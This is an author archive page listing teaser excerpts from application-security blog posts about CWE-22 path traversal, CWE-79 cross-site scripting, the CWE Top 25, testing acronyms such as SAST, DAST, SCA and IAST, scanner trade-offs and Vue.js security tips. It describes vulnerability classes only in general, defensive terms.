Katie Horne

ShiftLeft Blog - Medium

Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)CWE-22, also known as a path traversal vulnerability, refers to the ability of unauthorized parties to access restricted directories due to a lack of security.Why path traversal vulnerabilities are problematicPath traversal allows unauthorized users to access your files. Some of ... Read More

CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)Image by Markus Spiske from Pixabay.CWE-79, otherwise known as cross-site scripting (XSS) attacks, refers to a vulnerability that compromises end-users’ interactions with an application. XSS attacks concern developers of most languages — including C#, Go, Java, Python, and Scala, not just JavaScript — especially if ... Read More

Image by Lawrence Monk from Pixabay.In our previous post, we have mentioned that the Common Weakness Enumeration (CWE) list can be long and daunting to look at when you’re first getting started. As such, one of our recommendations is to focus on items that make up the CWE Top 25 Most ... Read More

Image by Werner Moser from Pixabay.In the upcoming weeks, we will be releasing a series of blog posts focusing on the Common Weakness Enumeration, a list of security vulnerability types. We will begin with an introduction to concepts we’ll refer to again and again in the future.What is the CWE List?In short, Common ... Read More

Image by S. Hermann & F. Richter from PixabayWe covered several acronyms common in application security in a previous post: SAST, DAST, and SCA. We’ll continue our discussion on AppSec concepts today by focusing on IAST, IaC, and secrets.Interactive application security testing (IAST)Interactive application security testing (IAST) is a fairly involved process. The ... Read More

How to balance accuracy and scan times when it comes to application security toolsImage by Gerd Altmann from PixabayWhen it comes to security tools, you’re typically balancing two things: how much time it takes for a tool to run to get deeper results vs. the quality of results returned.As you might expect, ... Read More

Scanning your code base frequently to discover security risk early in development gives engineers more time time to address issues. But security risk is a challenging issue and most developers need more than just time.Consider:Over 60% of identified vulnerabilities aren’t fixed.It takes ~three months to address an identified vulnerability.These facts mean that ... Read More

Photo by Lukas from PexelsThere are many application security testing (AST) tools on the market. To describe them, we have several acronyms, including SAST, DAST, SCA.But, what do they mean?In this post, we’ll cover the similarities and differences between SAST, DAST, and SCA so that you can make an informed decision as to ... Read More

We are pleased to announce that we have updated NG SAST to use the CPG deep analyzer for the analysis of Python applications!Python applications and the vulnerabilities they containAs of 2020, Python was the third most popular programming language in use. Python was originally released in 1991, and since then, Python’s ... Read More

Vue.js is a popular open-source JavaScript framework for building single-page applications and user interfaces. If you’re leveraging this lightweight framework for your apps, here are some security tips to keep in mind during and after development.Follow Vue.js’ official recommendationsWe would be remiss if we didn’t point out that the Vue.js ... Read More